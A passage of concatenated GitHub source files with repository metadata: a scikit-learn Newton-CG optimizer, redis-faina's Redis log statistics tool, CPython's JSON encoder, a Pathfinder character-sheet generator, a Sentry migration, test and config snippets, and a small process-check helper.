ri = fgrad
psupi = -ri
i = 0
dri0 = np.dot(ri, ri)
while i <= maxiter:
if np.sum(np.abs(ri)) <= tol:
break
Ap = fhess_p(psupi)
# check curvature
curv = np.dot(psupi, Ap)
if 0 <= curv <= 3 * np.finfo(np.float64).eps:
break
elif curv < 0:
if i > 0:
break
else:
# fall back to steepest descent direction
xsupi += dri0 / curv * psupi
break
alphai = dri0 / curv
xsupi += alphai * psupi
ri = ri + alphai * Ap
dri1 = np.dot(ri, ri)
betai = dri1 / dri0
psupi = -ri + betai * psupi
i = i + 1
dri0 = dri1 # update np.dot(ri,ri) for next time.
return xsupi
def newton_cg(grad_hess, func, grad, x0, args=(), tol=1e-4,
maxiter=100, maxinner=200, line_search=True, warn=True):
"""
Minimization of scalar function of one or more variables using the
Newton-CG algorithm.
Parameters
----------
grad_hess : callable
Should return the gradient and a callable returning the matvec product
of the Hessian.
func : callable
Should return the value of the function.
grad : callable
Should return the function value and the gradient. This is used
by the linesearch functions.
x0 : array of float
Initial guess.
args: tuple, optional
Arguments passed to func_grad_hess, func and grad.
tol : float
Stopping criterion. The iteration will stop when
``max{|g_i | i = 1, ..., n} <= tol``
where ``g_i`` is the i-th component of the gradient.
maxiter : int
Number of Newton iterations.
maxinner : int
Number of CG iterations.
line_search: boolean
Whether to use a line search or not.
warn: boolean
Whether to warn when didn't converge.
Returns
-------
xk : ndarray of float
Estimated minimum.
"""
x0 = np.asarray(x0).flatten()
xk = x0
k = 0
if line_search:
old_fval = func(x0, *args)
old_old_fval = None
# Outer loop: our Newton iteration
while k < maxiter:
# Compute a search direction pk by applying the CG method to
# del2 f(xk) p = - fgrad f(xk) starting from 0.
fgrad, fhess_p = grad_hess(xk, *args)
absgrad = np.abs(fgrad)
if np.max(absgrad) < tol:
break
maggrad = np.sum(absgrad)
eta = min([0.5, np.sqrt(maggrad)])
termcond = eta * maggrad
# Inner loop: solve the Newton update by conjugate gradient, to
# avoid inverting the Hessian
xsupi = _cg(fhess_p, fgrad, maxiter=maxinner, tol=termcond)
alphak = 1.0
if line_search:
try:
alphak, fc, gc, old_fval, old_old_fval, gfkp1 = \
_line_search_wolfe12(func, grad, xk, xsupi, fgrad,
old_fval, old_old_fval, args=args)
except _LineSearchError:
warnings.warn('Line Search failed')
break
xk = xk + alphak * xsupi # upcast if necessary
k += 1
if warn and k >= maxiter:
warnings.warn("newton-cg failed to converge. Increase the "
"number of iterations.")
return xk, k
|
{
"content_hash": "26499988b3e05200f67c3d780b03abcd",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 78,
"avg_line_length": 27.886699507389164,
"alnum_prop": 0.5797562268150503,
"repo_name": "DailyActie/Surrogate-Model",
"id": "0ecb5e0e18db73965d70e8dc6b0f3fd5ddaa4472",
"size": "5661",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "01-codes/scikit-learn-master/sklearn/utils/optimize.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "345"
},
{
"name": "Batchfile",
"bytes": "18746"
},
{
"name": "C",
"bytes": "13004913"
},
{
"name": "C++",
"bytes": "14692003"
},
{
"name": "CMake",
"bytes": "72831"
},
{
"name": "CSS",
"bytes": "303488"
},
{
"name": "Fortran",
"bytes": "7339415"
},
{
"name": "HTML",
"bytes": "854774"
},
{
"name": "Java",
"bytes": "38854"
},
{
"name": "JavaScript",
"bytes": "2432846"
},
{
"name": "Jupyter Notebook",
"bytes": "829689"
},
{
"name": "M4",
"bytes": "1379"
},
{
"name": "Makefile",
"bytes": "48708"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "PHP",
"bytes": "93585"
},
{
"name": "Pascal",
"bytes": "1449"
},
{
"name": "Perl",
"bytes": "1152272"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "34668203"
},
{
"name": "Roff",
"bytes": "5925"
},
{
"name": "Ruby",
"bytes": "92498"
},
{
"name": "Shell",
"bytes": "94698"
},
{
"name": "TeX",
"bytes": "156540"
},
{
"name": "TypeScript",
"bytes": "41691"
}
],
"symlink_target": ""
}
|
import logging
import sys
from lib.wikipediaresolver import WikipediaResolver
from lib.prettyfier import Prettyfier
__author__ = 'jnowak'
logging.basicConfig(format='%(message)s', level=logging.DEBUG)
try:
finish_at = sys.argv[2].decode('utf-8')
except IndexError:
finish_at = 'Straż Pożarna'
try:
start_from = sys.argv[1].decode('utf-8')
except IndexError:
logging.error('Usage: python parse.py <start_from> <finish_at> (optional)')
exit()
resolver = WikipediaResolver(start_from, finish_at)
links = resolver.solve()
Prettyfier.print_nicely(links)
|
{
"content_hash": "3d30678a7bd795ca695f926112514880",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 79,
"avg_line_length": 21.40740740740741,
"alnum_prop": 0.7249134948096886,
"repo_name": "diego351/wikiparser",
"id": "b7382b816e06962703bd1577cc65a21ae3f68955",
"size": "604",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "parse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4339"
}
],
"symlink_target": ""
}
|
import argparse
import sys
from collections import defaultdict
import re
line_re_24 = re.compile(r"""
^(?P<timestamp>[\d\.]+)\s(\(db\s(?P<db>\d+)\)\s)?"(?P<command>\w+)"(\s"(?P<key>[^(?<!\\)"]+)(?<!\\)")?(\s(?P<args>.+))?$
""", re.VERBOSE)
line_re_26 = re.compile(r"""
^(?P<timestamp>[\d\.]+)\s\[(?P<db>\d+)\s\d+\.\d+\.\d+\.\d+:\d+]\s"(?P<command>\w+)"(\s"(?P<key>[^(?<!\\)"]+)(?<!\\)")?(\s(?P<args>.+))?$
""", re.VERBOSE)
class StatCounter(object):
def __init__(self, prefix_delim=':', redis_version=2.6):
self.line_count = 0
self.skipped_lines = 0
self.commands = defaultdict(int)
self.keys = defaultdict(int)
self.prefixes = defaultdict(int)
self.times = []
self._cached_sorts = {}
self.start_ts = None
self.last_ts = None
self.last_entry = None
self.prefix_delim = prefix_delim
self.redis_version = redis_version
self.line_re = line_re_24 if self.redis_version < 2.5 else line_re_26
def _record_duration(self, entry):
ts = float(entry['timestamp']) * 1000 * 1000 # microseconds
if not self.start_ts:
self.start_ts = ts
self.last_ts = ts
duration = ts - self.last_ts
if self.redis_version < 2.5:
cur_entry = entry
else:
cur_entry = self.last_entry
self.last_entry = entry
if duration and cur_entry:
self.times.append((duration, cur_entry))
self.last_ts = ts
def _record_command(self, entry):
self.commands[entry['command']] += 1
def _record_key(self, key):
self.keys[key] += 1
parts = key.split(self.prefix_delim)
if len(parts) > 1:
self.prefixes[parts[0]] += 1
@staticmethod
def _reformat_entry(entry):
max_args_to_show = 5
output = '"%(command)s"' % entry
if entry['key']:
output += ' "%(key)s"' % entry
if entry['args']:
arg_parts = entry['args'].split(' ')
ellipses = ' ...' if len(arg_parts) > max_args_to_show else ''
output += ' %s%s' % (' '.join(arg_parts[0:max_args_to_show]), ellipses)
return output
def _get_or_sort_list(self, ls):
key = id(ls)
if not key in self._cached_sorts:
sorted_items = sorted(ls)
self._cached_sorts[key] = sorted_items
return self._cached_sorts[key]
def _time_stats(self, times):
sorted_times = self._get_or_sort_list(times)
num_times = len(sorted_times)
percent_50 = sorted_times[int(num_times / 2)][0]
percent_75 = sorted_times[int(num_times * .75)][0]
percent_90 = sorted_times[int(num_times * .90)][0]
percent_99 = sorted_times[int(num_times * .99)][0]
return (("Median", percent_50),
("75%", percent_75),
("90%", percent_90),
("99%", percent_99))
def _heaviest_commands(self, times):
times_by_command = defaultdict(int)
for time, entry in times:
times_by_command[entry['command']] += time
return self._top_n(times_by_command)
def _slowest_commands(self, times, n=8):
sorted_times = self._get_or_sort_list(times)
slowest_commands = reversed(sorted_times[-n:])
printable_commands = [(str(time), self._reformat_entry(entry)) \
for time, entry in slowest_commands]
return printable_commands
def _general_stats(self):
total_time = (self.last_ts - self.start_ts) / (1000*1000)
return (
("Lines Processed", self.line_count),
("Commands/Sec", '%.2f' % (self.line_count / total_time))
)
def process_entry(self, entry):
self._record_duration(entry)
self._record_command(entry)
if entry['key']:
self._record_key(entry['key'])
def _top_n(self, stat, n=8):
sorted_items = sorted(stat.iteritems(), key = lambda x: x[1], reverse = True)
return sorted_items[:n]
def _pretty_print(self, result, title, percentages=False):
print title
print '=' * 40
if not result:
print 'n/a\n'
return
max_key_len = max((len(x[0]) for x in result))
max_val_len = max((len(str(x[1])) for x in result))
for key, val in result:
key_padding = max(max_key_len - len(key), 0) * ' '
if percentages:
val_padding = max(max_val_len - len(str(val)), 0) * ' '
val = '%s%s\t(%.2f%%)' % (val, val_padding, (float(val) / self.line_count) * 100)
print key,key_padding,'\t',val
print
def print_stats(self):
self._pretty_print(self._general_stats(), 'Overall Stats')
self._pretty_print(self._top_n(self.prefixes), 'Top Prefixes', percentages = True)
self._pretty_print(self._top_n(self.keys), 'Top Keys', percentages = True)
self._pretty_print(self._top_n(self.commands), 'Top Commands', percentages = True)
self._pretty_print(self._time_stats(self.times), 'Command Time (microsecs)')
self._pretty_print(self._heaviest_commands(self.times), 'Heaviest Commands (microsecs)')
self._pretty_print(self._slowest_commands(self.times), 'Slowest Calls')
def process_input(self, input):
for line in input:
self.line_count += 1
line = line.strip()
match = self.line_re.match(line)
if not match:
if line != "OK":
self.skipped_lines += 1
continue
self.process_entry(match.groupdict())
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'input',
type = argparse.FileType('r'),
default = sys.stdin,
nargs = '?',
help = "File to parse; will read from stdin otherwise")
parser.add_argument(
'--prefix-delimiter',
type = str,
default = ':',
help = "String to split on for delimiting prefix and rest of key",
required = False)
parser.add_argument(
'--redis-version',
type = float,
default = 2.6,
help = "Version of the redis server being monitored",
required = False)
args = parser.parse_args()
counter = StatCounter(prefix_delim = args.prefix_delimiter, redis_version = args.redis_version)
counter.process_input(args.input)
counter.print_stats()
|
{
"content_hash": "caefdd5bca74e3b38a19e904156f4ff6",
"timestamp": "",
"source": "github",
"line_count": 178,
"max_line_length": 140,
"avg_line_length": 36.76966292134831,
"alnum_prop": 0.545912910618793,
"repo_name": "facebookarchive/redis-faina",
"id": "73de63d9115721633d19b1052cc3c81442f2c22e",
"size": "6568",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "redis-faina.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "6568"
},
{
"name": "Shell",
"bytes": "1783"
}
],
"symlink_target": ""
}
|
import collections, subprocess, shlex, shm, gevent, imp
procstat = collections.namedtuple('procstat', ['code', 'stdout', 'stderr'])
def proc_running(process):
return shell('pgrep -f {}'.format(process)).code == 0
def shell(command):
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc.wait()
return procstat(proc.returncode, proc.stdout.read(), proc.stderr.read())
def delayed(time, func):
gevent.sleep(time)
return func()
def is_changing(func, length = 100):
val = func()
updated = False
iters = 0
while iters < length:
if func() != val:
updated = True
break
gevent.sleep(0.01)
iters += 1
return updated
|
{
"content_hash": "2596d698783705117e61375622379da8",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 96,
"avg_line_length": 23.53125,
"alnum_prop": 0.6308100929614874,
"repo_name": "cuauv/software",
"id": "92b4f02aaa03123fd107fef20b609cf825ce5287",
"size": "753",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "system_check/runtime.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "271780"
},
{
"name": "C++",
"bytes": "2831785"
},
{
"name": "CMake",
"bytes": "5365"
},
{
"name": "CSS",
"bytes": "5082"
},
{
"name": "Dockerfile",
"bytes": "2758"
},
{
"name": "Emacs Lisp",
"bytes": "19028"
},
{
"name": "GLSL",
"bytes": "6783"
},
{
"name": "HTML",
"bytes": "3642"
},
{
"name": "Haskell",
"bytes": "4770"
},
{
"name": "JavaScript",
"bytes": "113413"
},
{
"name": "Makefile",
"bytes": "12887"
},
{
"name": "Nix",
"bytes": "16335"
},
{
"name": "OCaml",
"bytes": "3804"
},
{
"name": "PureBasic",
"bytes": "58"
},
{
"name": "Python",
"bytes": "2141765"
},
{
"name": "Scheme",
"bytes": "129544"
},
{
"name": "Shell",
"bytes": "68820"
},
{
"name": "TeX",
"bytes": "25243"
},
{
"name": "Vim script",
"bytes": "125505"
}
],
"symlink_target": ""
}
|
'''This module contains a script for generating Pathfinder character
sheets in LaTeX'''
import argparse
import fileinput
import os
import shutil
from string import Template
from core.pf_character import PFCharacter
__all__ = []
# --- Constants ---
TEMPLATE_FILES = [
'/main.tex',
'/character.tex',
'/res/latex/class/class1.tex',
'/res/latex/stats/defense.tex',
'/res/latex/stats/offense.tex',
]
def generate_character(dest_path, char_path="default.json"):
'''Generates a LaTeX project for a Pathfinder character sheet
:param dest_path: destination directory for character sheet
:param char_path: path to JSON file with Pathfinder character data
'''
character = PFCharacter(char_path)
# update the destination path string to reflect imported character vals
dest_path = "%s/%s" % (dest_path, character.name)
shutil.copytree('template/Character Sheet', dest_path)
set_char_vals(dest_path, character.get_template_values())
def parse_cmd_args():
'''Parses command line arguments
:returns map data structure containing each argument and associated value
'''
# create parser for command line arguments
help_desc = 'Generates LaTeX character sheets for the Pathfinder RPG'
parser = argparse.ArgumentParser(description=help_desc)
# -argument- sets destination directory for output
parser.add_argument('dest', help='destination directory for output')
# -argument [optional]- import character from a JSON file
parser.add_argument('--import', metavar='PATH',
help='imports character data from JSON file')
# parse command line arguments
args = vars(parser.parse_args())
return args
def set_char_vals(char_path, char_vals):
'''Replaces placeholder values in character sheet template with those that
describe a particular character
:param char_path directory containing the character sheet
:param char_vals dictionary structured according to string.Template
'''
# replace placeholder values in character sheet template
for x in TEMPLATE_FILES:
# read file data
template_file = open(char_path + x, 'r')
template_data = template_file.read()
template_file.close()
# apply values to template
replace_text = Template(template_data).substitute(char_vals)
# write data to file
template_file = open(char_path + x, 'w')
template_file.write(replace_text)
template_file.close()
# rename the character.tex to reflect the change in character name
os.rename('%s/character.tex' % char_path,
'%s/%s.tex' % (char_path, char_vals['name']))
# rename the class1.tex to reflect the change in character name
new_path_tuple = (char_path, char_vals['class1'])
os.rename('%s/res/latex/class/class1.tex' % char_path,
'%s/res/latex/class/%s.tex' % new_path_tuple)
os.rename('%s/res/latex/class-features/display/class1.tex' % char_path,
'%s/res/latex/class-features/display/%s.tex' % new_path_tuple)
# --- Script ---
if __name__ == '__main__':
# parse command line arguments
args = parse_cmd_args()
# generate character
if args['import'] is not None:
generate_character(args['dest'], args['import'])
else:
generate_character(args['dest'])
|
{
"content_hash": "902b4c89a9bfa28dbf6660331ea19d4c",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 78,
"avg_line_length": 32.371428571428574,
"alnum_prop": 0.6654898499558694,
"repo_name": "lot9s/pathfinder-rpg-utils",
"id": "98a15d46f582f8baa56b2f4b9b9a5c4791aaf039",
"size": "3399",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "character-sheets/creator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "47955"
},
{
"name": "TeX",
"bytes": "22739"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
# This flag is used to mark that a migration shouldn't be automatically run in
# production. We set this to True for operations that we think are risky and want
# someone from ops to run manually and monitor.
# General advice is that if in doubt, mark your migration as `is_dangerous`.
# Some things you should always mark as dangerous:
# - Large data migrations. Typically we want these to be run manually by ops so that
# they can be monitored. Since data migrations will now hold a transaction open
# this is even more important.
# - Adding columns to highly active tables, even ones that are NULL.
is_dangerous = False
# This flag is used to decide whether to run this migration in a transaction or not.
# By default we prefer to run in a transaction, but for migrations where you want
# to `CREATE INDEX CONCURRENTLY` this needs to be set to False. Typically you'll
# want to create an index concurrently when adding one to an existing table.
atomic = True
dependencies = [
('sentry', '0051_fix_auditlog_pickled_data'),
]
operations = [
migrations.AddField(
model_name='organizationonboardingtask',
name='completion_seen',
field=models.DateTimeField(null=True),
),
]
|
{
"content_hash": "fa694b327e9e1a612d8821cdd16c7f9f",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 88,
"avg_line_length": 41.114285714285714,
"alnum_prop": 0.6942321056289089,
"repo_name": "beeftornado/sentry",
"id": "efdf871209ebf7ce25c5ef97d0e5b409f756b007",
"size": "1513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/sentry/migrations/0052_organizationonboardingtask_completion_seen.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "157195"
},
{
"name": "HTML",
"bytes": "197026"
},
{
"name": "JavaScript",
"bytes": "380379"
},
{
"name": "Makefile",
"bytes": "2832"
},
{
"name": "Python",
"bytes": "6473603"
}
],
"symlink_target": ""
}
|
import pytest
@pytest.fixture
def resources(plan_runner):
_, resources = plan_runner()
return resources
def test_resource_count(resources):
"Test number of resources created."
assert len(resources) == 2
def test_iam(resources):
"Test IAM binding resources."
bindings = [r['values'] for r in resources if r['type']
== 'google_storage_bucket_iam_binding']
assert len(bindings) == 1
assert bindings[0]['role'] == 'roles/storage.admin'
|
{
"content_hash": "43901c8216dd5386a29c30d9a38efef4",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 57,
"avg_line_length": 23.4,
"alnum_prop": 0.6816239316239316,
"repo_name": "GoogleCloudPlatform/cloud-foundation-fabric",
"id": "abaf45781f1ea55d77e601df8e2e8633528720a4",
"size": "1044",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/modules/container_registry/test_plan.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "6486"
},
{
"name": "Go",
"bytes": "16234"
},
{
"name": "HCL",
"bytes": "1945131"
},
{
"name": "JavaScript",
"bytes": "9392"
},
{
"name": "PowerShell",
"bytes": "16024"
},
{
"name": "Python",
"bytes": "479385"
},
{
"name": "Shell",
"bytes": "17367"
},
{
"name": "Smarty",
"bytes": "7294"
}
],
"symlink_target": ""
}
|
"""Implementation of JSONEncoder
"""
import re
try:
from _json import encode_basestring_ascii as c_encode_basestring_ascii
except ImportError:
c_encode_basestring_ascii = None
try:
from _json import encode_basestring as c_encode_basestring
except ImportError:
c_encode_basestring = None
try:
from _json import make_encoder as c_make_encoder
except ImportError:
c_make_encoder = None
ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')
HAS_UTF8 = re.compile(b'[\x80-\xff]')
ESCAPE_DCT = {
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i))
#ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
INFINITY = float('inf')
FLOAT_REPR = repr
def py_encode_basestring(s):
"""Return a JSON representation of a Python string
"""
def replace(match):
return ESCAPE_DCT[match.group(0)]
return '"' + ESCAPE.sub(replace, s) + '"'
encode_basestring = (c_encode_basestring or py_encode_basestring)
def py_encode_basestring_ascii(s):
"""Return an ASCII-only JSON representation of a Python string
"""
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
return '\\u{0:04x}'.format(n)
#return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u{0:04x}\\u{1:04x}'.format(s1, s2)
return '"' + ESCAPE_ASCII.sub(replace, s) + '"'
encode_basestring_ascii = (
c_encode_basestring_ascii or py_encode_basestring_ascii)
class JSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str | string |
+-------------------+---------------+
| int, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, default=None):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, float or None. If
skipkeys is True, such items are simply skipped.
If ensure_ascii is true, the output is guaranteed to be str
objects with all incoming non-ASCII characters escaped. If
ensure_ascii is false, the output can contain non-ASCII characters.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation.
If specified, separators should be an (item_separator, key_separator)
tuple. The default is (', ', ': ') if *indent* is ``None`` and
(',', ': ') otherwise. To get the most compact JSON representation,
you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
elif indent is not None:
self.item_separator = ','
if default is not None:
self.default = default
def default(self, o):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
# Let the base class default method raise the TypeError
return JSONEncoder.default(self, o)
"""
raise TypeError(repr(o) + " is not JSON serializable")
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> from json.encoder import JSONEncoder
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, str):
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, _one_shot=True)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
return ''.join(chunks)
def iterencode(self, o, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
if self.ensure_ascii:
_encoder = encode_basestring_ascii
else:
_encoder = encode_basestring
def floatstr(o, allow_nan=self.allow_nan,
_repr=FLOAT_REPR, _inf=INFINITY, _neginf=-INFINITY):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on the
# internals.
if o != o:
text = 'NaN'
elif o == _inf:
text = 'Infinity'
elif o == _neginf:
text = '-Infinity'
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " +
repr(o))
return text
if (_one_shot and c_make_encoder is not None
and self.indent is None):
_iterencode = c_make_encoder(
markers, self.default, _encoder, self.indent,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, self.allow_nan)
else:
_iterencode = _make_iterencode(
markers, self.default, _encoder, self.indent, floatstr,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, _one_shot)
return _iterencode(o, 0)
def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
_key_separator, _item_separator, _sort_keys, _skipkeys, _one_shot,
## HACK: hand-optimized bytecode; turn globals into locals
ValueError=ValueError,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
str=str,
tuple=tuple,
):
if _indent is not None and not isinstance(_indent, str):
_indent = ' ' * _indent
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + _indent * _current_indent_level
separator = _item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, str):
yield buf + _encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, int):
# Subclasses of int/float may override __str__, but we still
# want to encode them as integers/floats in JSON. One example
# within the standard library is IntEnum.
yield buf + str(int(value))
elif isinstance(value, float):
# see comment above for int
yield buf + _floatstr(float(value))
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
yield from chunks
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + _indent * _current_indent_level
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + _indent * _current_indent_level
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0])
else:
items = dct.items()
for key, value in items:
if isinstance(key, str):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
# see comment for int/float in _make_iterencode
key = _floatstr(float(key))
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, int):
# see comment for int/float in _make_iterencode
key = str(int(key))
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, str):
yield _encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, int):
# see comment for int/float in _make_iterencode
yield str(int(value))
elif isinstance(value, float):
# see comment for int/float in _make_iterencode
yield _floatstr(float(value))
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
yield from chunks
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + _indent * _current_indent_level
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, str):
yield _encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, int):
# see comment for int/float in _make_iterencode
yield str(int(o))
elif isinstance(o, float):
# see comment for int/float in _make_iterencode
yield _floatstr(float(o))
elif isinstance(o, (list, tuple)):
yield from _iterencode_list(o, _current_indent_level)
elif isinstance(o, dict):
yield from _iterencode_dict(o, _current_indent_level)
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
yield from _iterencode(o, _current_indent_level)
if markers is not None:
del markers[markerid]
return _iterencode
|
{
"content_hash": "a8a648c4796897808916061e8a85e69d",
"timestamp": "",
"source": "github",
"line_count": 440,
"max_line_length": 78,
"avg_line_length": 37.31363636363636,
"alnum_prop": 0.5159580947740285,
"repo_name": "Suwmlee/XX-Net",
"id": "a071cc677a6f2f59e4919cc1cec472a6e8f2c86a",
"size": "16418",
"binary": false,
"copies": "1",
"ref": "refs/heads/python3",
"path": "Python3/lib/json/encoder.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "200"
},
{
"name": "C",
"bytes": "33097"
},
{
"name": "CSS",
"bytes": "86345"
},
{
"name": "HTML",
"bytes": "141382"
},
{
"name": "JavaScript",
"bytes": "345991"
},
{
"name": "PHP",
"bytes": "10671"
},
{
"name": "Python",
"bytes": "17312939"
},
{
"name": "Shell",
"bytes": "4647"
},
{
"name": "Visual Basic",
"bytes": "382"
}
],
"symlink_target": ""
}
|
"""
WSGI config for buildservice project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
import dotenv
dotenv.read_dotenv(os.path.join(os.path.dirname(os.path.dirname(__file__)), '.env'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "buildservice.settings")
application = get_wsgi_application() # pylint: disable=invalid-name
|
{
"content_hash": "1da586e123c9ac55e922d102a2902c80",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 84,
"avg_line_length": 29.555555555555557,
"alnum_prop": 0.7631578947368421,
"repo_name": "m-vdb/github-buildservice-boilerplate",
"id": "1abe720589cc58deef36286bdc6162680566c8cd",
"size": "532",
